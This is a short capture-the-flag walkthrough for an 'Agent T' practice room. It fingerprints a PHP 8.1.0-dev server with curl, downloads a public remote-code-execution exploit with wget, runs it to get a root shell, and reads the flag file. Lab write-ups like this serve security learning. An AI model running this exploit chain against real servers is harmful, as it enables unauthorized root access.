Agent T

AgentT room has a weird behaving admin dashboard which isn't operational. Attacker needs to find their way into the server!

Target Details

TARGET_IP : 10.10.71.24
HTTP service running on Port 80

Send Request to Target Machine

Send Get request
```
curl -X GET http://{TARGET_IP}

--snip--
```
returns webpage html content (basic template from the web)

Investigate headers

$ curl -I http://10.10.71.24
HTTP/1.1 200 OK
Host: 10.10.71.24
Date: Sun, 27 Nov 2022 07:57:06 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8

Now we know that server is running PHP 8.1.0 dev on backend

Finding for PHP 8.1.0-dev exploits on the web, we get a RCE exploit from exploit-db

Running Exploit Script

Download Exploit

wget https://www.exploit-db.com/download/49933 -O exploit.py

Execute Exploit

$ python3 exploit-t.py 
Enter the full host url:
http://{TARGET_IP}

Interactive shell is opened on http://{TARGET_IP}
Can't acces tty; job crontol turned off.
$ whoami
root

Now we can execute code remotely on the web server as root user

Get The FLAG!!

List directories

$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

flat.txt is in / dir

Read Flag
```
$ cat /flag.txt
flag{REDACTED}
```

PreviousOverPass2 NextVulnerable API App

Last updated 3 years ago

Was this helpful?